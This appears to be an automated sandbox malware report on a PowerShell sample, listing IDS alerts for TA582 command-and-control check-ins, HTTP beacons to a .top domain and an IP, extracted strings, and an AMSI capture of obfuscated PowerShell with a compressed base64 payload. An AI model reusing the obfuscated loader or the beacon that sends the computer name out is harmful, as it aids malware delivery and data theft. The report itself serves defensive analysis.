Source: | Binary string: softy.pdb source: powershell.exe, 00000000.00000002.214415932158.000002B59DD06000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.214413541471.000002B59D9F9000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.214413541471.000002B59DA4F000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.214413541471.000002B59D9F9000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.214415932158.000002B59DD06000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb2S source: powershell.exe, 00000000.00000002.214415932158.000002B59DD06000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdb source: powershell.exe, 00000000.00000002.214413541471.000002B59DA25000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb~ source: powershell.exe, 00000000.00000002.214413541471.000002B59DA4F000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbL source: powershell.exe, 00000000.00000002.214415932158.000002B59DD06000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.214415932158.000002B59DD06000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.214413541471.000002B59DA4F000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdbP source: powershell.exe, 00000000.00000002.214413541471.000002B59DA25000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32port (PPPOE) source: powershell.exe, 00000000.00000002.214413541471.000002B59D973000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: utomation.pdb~ source: powershell.exe, 00000000.00000002.214372199467.000002B5856EA000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: Network traffic | Suricata IDS: 2859405 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.20:53558 -> 1.1.1.1:53 |
Source: Network traffic | Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49767 -> 142.250.80.68:80 |
Source: Network traffic | Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49766 -> 45.61.136.138:80 |
Source: Network traffic | Suricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.11.20:49766 -> 45.61.136.138:80 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGO65tLsGIjBnSc1rY90EJ2UX5dVfBhiFJz-fsH3WL528peX0zLlF-Ej0KAN5ElVwvxuRLQoKxpkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=D4J9Jy-QDIuri1RL3u-AurJ2p5WDcoMhdNtQKqQy_w2ZiFaFk0e-CuZ-n-2ehO5cUY9Ha_hKL-gW9x0J5FwrzmdyD9t9stOD5vgjCkP0Dt1AKkO4xDmeFBZB77rbUgijs7bjX1DO9X-2qUHhDpP5U-USgB0LPugRZGd332m2NTQ_R1J0jT3qqFmlFpAi2JvRY-yn |
Source: global traffic | HTTP traffic detected: GET /zm520bcoi4htr.php?id=computer&key=77853249548&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGO65tLsGIjBnSc1rY90EJ2UX5dVfBhiFJz-fsH3WL528peX0zLlF-Ej0KAN5ElVwvxuRLQoKxpkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=D4J9Jy-QDIuri1RL3u-AurJ2p5WDcoMhdNtQKqQy_w2ZiFaFk0e-CuZ-n-2ehO5cUY9Ha_hKL-gW9x0J5FwrzmdyD9t9stOD5vgjCkP0Dt1AKkO4xDmeFBZB77rbUgijs7bjX1DO9X-2qUHhDpP5U-USgB0LPugRZGd332m2NTQ_R1J0jT3qqFmlFpAi2JvRY-yn |
Source: global traffic | HTTP traffic detected: GET /zm520bcoi4htr.php?id=computer&key=77853249548&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGO65tLsGIjBnSc1rY90EJ2UX5dVfBhiFJz-fsH3WL528peX0zLlF-Ej0KAN5ElVwvxuRLQoKxpkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=D4J9Jy-QDIuri1RL3u-AurJ2p5WDcoMhdNtQKqQy_w2ZiFaFk0e-CuZ-n-2ehO5cUY9Ha_hKL-gW9x0J5FwrzmdyD9t9stOD5vgjCkP0Dt1AKkO4xDmeFBZB77rbUgijs7bjX1DO9X-2qUHhDpP5U-USgB0LPugRZGd332m2NTQ_R1J0jT3qqFmlFpAi2JvRY-yn |
Source: powershell.exe, 00000000.00000002.214372614729.000002B586A70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$tcbm1lixhefpkn0/$9rkis8hejvfl3c4.php? |
Source: powershell.exe, 00000000.00000002.214372614729.000002B586A70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$tcbm1lixhefpkn0/$9rkis8hejvfl3c4.php?id=$env:computername&key=$bhwpnfx&s=527 |
Source: powershell.exe, 00000000.00000002.214372199467.000002B585683000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.214372199467.000002B585657000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.214415778769.000002B59DAF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.214372199467.000002B5856EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micrq |
Source: powershell.exe, 00000000.00000002.214413541471.000002B59DA3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.t.com/pki/crl/pr |
Source: powershell.exe, 00000000.00000002.214372199467.000002B585683000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.verisign. |
Source: powershell.exe, 00000000.00000002.214372614729.000002B5868D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.214372614729.000002B586838000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top |
Source: powershell.exe, 00000000.00000002.214372614729.000002B586838000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/zm520bcoi4htr.php?id=computer&key=77853249548&s=527 |
Source: powershell.exe, 00000000.00000002.214372614729.000002B586838000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/zm520bcoi4htr.php?id=computer&key=77853249548&s=527p |
Source: powershell.exe, 00000000.00000002.214406543074.000002B59580D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.214372614729.000002B58594C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.214372614729.000002B58594C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.214372614729.000002B58594C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.214372614729.000002B585771000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.214372614729.000002B58594C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.214413541471.000002B59DA3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wsoft.com/pki/ceroCerAut_2010-06- |
Source: powershell.exe, 00000000.00000002.214372614729.000002B58594C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.214372614729.000002B58594C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.214372614729.000002B5868F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.214372614729.000002B5868D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.214372614729.000002B5868E3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.214372614729.000002B586A70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.214372614729.000002B5868F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgS_YOPMGO65tLsGIjBnSc1rY90EJ2UX5dVfBhiFJz-fsH3WL528peX0zLlF-Ej0KAN5ElVwvxu |
Source: powershell.exe, 00000000.00000002.214372614729.000002B5868E3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS_YOPMGO65tLsGIjBnSc1rY90EJ2UX |
Source: powershell.exe, 00000000.00000002.214372199467.000002B585683000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.214372614729.000002B585771000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.214406543074.000002B59580D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.214406543074.000002B59580D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.214406543074.000002B59580D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.214372614729.000002B5868E3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.214372614729.000002B58594C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.214372614729.000002B58594C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.214413541471.000002B59DA13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.c |
Source: powershell.exe, 00000000.00000002.214406543074.000002B59580D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.214372199467.000002B585683000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.214372614729.000002B586909000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.214372614729.000002B586903000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.214372614729.000002B5868D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:824:304:WilStaging_02 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:824:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $nrgjt5lz4yhicsu.(([char[]]@((8949-(23768232/(10160-7484))),(-1767+1878),(295792/2641),(-366+487),(298-(1734-1520)),(106116/956)) -join ''))( $8rp61yw5vju9sxg ) $nrgjt5lz4yhicsu.(([char[]]@((2213-2146),(177120/1640),(840714/7574),(867905/7547),(980003/9703)) -join ''))()$mpcn9vr7q8td12h.((-join (@((8237-8170),(-1034+(2397-(-1404+(10043043/(-110+3887))))),(-3145+3256),(-178+293),(535401/(37038087/6987)))| ForEach-Object { [char]$_ })))()[byte[]] $ia65phg4rfbu2qz = $8rp61yw5vju9sxg.(([system.String]::new(@((-1816+1900),(-10010+10121),(542100/8340),(953040/8360),(-4493+4607),(-9116+9213),(20691/171)))))() $l452znyjpth30ve=$ia65phg4rfbu2qz return $l452znyjpth30ve}[System.Text.Encoding]::ascii.(([char[]]@((6103-(2087072/(1393342/4027))),(-4408+4509),(5001-(36427445/7457)),(-6108+6191),(1026136/(15441-6595)),(812478/(41913887/5881)),(187530/(5672-(11890-8004))),(3163-(460+2593)),(5522-(15969793/2947))) -join ''))((5dmopfzenxq8c3istrw67al9vku "KP99ZzFrOWYyaantbBtosESspk32ttWxZ+e2KXfY1nEtKz/VeuvvZ/woJmqVyVy7lVrhJaD9Lb3p1IuO7Y/l8yUxa4X2exsWUburDMxEUsvHPsPPhQubmMmX3MXVjuvtiY+cisi0lvjImcSP3q+m9JqgivHRThu+GDuqOU8QxomhBkrLT4qB4MKs1igoVOiO0J2QnW7Ex57ErJ/a/Kf+2G91ZjiLV07ByJwnaMe0hBjBk8aF8vfKOW/3pJnOlAOuq+vLvs6wR7lkofUczOYoEJTelB8p57qP90MHFmqFvNlNtkiDUq+O82szzlhy/sA2f13S18g327enV+GJz67fFIspsdezRIPRXFBirCsQ9dxooBWL+uOnnhtT1mRpmGUslsOhjYckh7EuGu0pr1kd6k3WfXCaRkaYWa3ytcx5JO3ini6mbC7Y3VmOT+jRm5UEgAaCe1sLkJ0msoaGCygpkAia/c+PxMyTuXqKHIE0ptgKUusYTCailPc5ZatqBBlc35dQUw+1U68K+e/NRAEJ+WR/JpItoIcoLE8R7P6X2/xluif3qyj/PBk1MgMRs44udD8Avp7Vr9DC89ap+urXeZOc+xCZTN3oijr5QJtWFJ3eM9VRa9ncQEq3Y99qQeXGb78jHD28NqCn2WTsHb/HajpVFEtw9KL+ngf6i+2JEsFS5ma6ZRm44vbEZTnR9n4bjSd5i3C5pxUTtmzPONjhgsm/QkuowT7ERBq7uh1KfHnCymQqXtEHRaRTY9+4F8q62TtaSM+IwYL/k6M2eDs6SUZU1tgNEEYNxomImOyWQxJCGgbKCoW0NYc7pGOypgh6MBfyeLjeI9SF7kC/XBMM55R8JtO+oaudpftAoP8JU2lY3DSleB/HKhQN8zxuzYqmvrMn0NfZj8VE3KLHLd+oXFTUSaTMAkT81DtLA/NADSnGmdvnQvgg/HnHVdOHpS1fhsHNi0qeTKtqpormvV8+zX/SixAAE91Npgm0QKa1WtSx4W3gJDcoFfpIUnW3MHzKeBqQtmacZ9kP0ggIhcsKHkAeQ5LFPsOP3pOCllTcp5hbHsuAxoeiwI6FR9jJgf3qYJP6uB9kTp0LUmtjvr9X0pcXjYqDCL0lVIHs9xHdLbbvgjtjC2Z9yionJcvKG1nfmH6vlmRC5yNkOK+i7WXccY0wS5LA6FsGuFo76K4Wgp3Dx2GbLkopQ1h6c6zyQM/Vu1j0RL3VQ0t38vicfRqbVF/bHuS02wS0YTyyo0DRq64F+/hancBwx2JtfI2MjrzrVfx5PGrEpU35jTXPg1Jl7h5U4zQIu32Grw8/baa+gtLyx/CRfXmpzYiuzrH8ltvOD0oOlOLYqtE5nvJ2yIeXCy+T13nGqTnFmqUQRnkH9yFX8RQ9FrLk9hmqIg7RK6g2Ka61enWE4lhMKZtw+rYRRaQvG3Dqf+41riysTxFZwoi243LLm5D |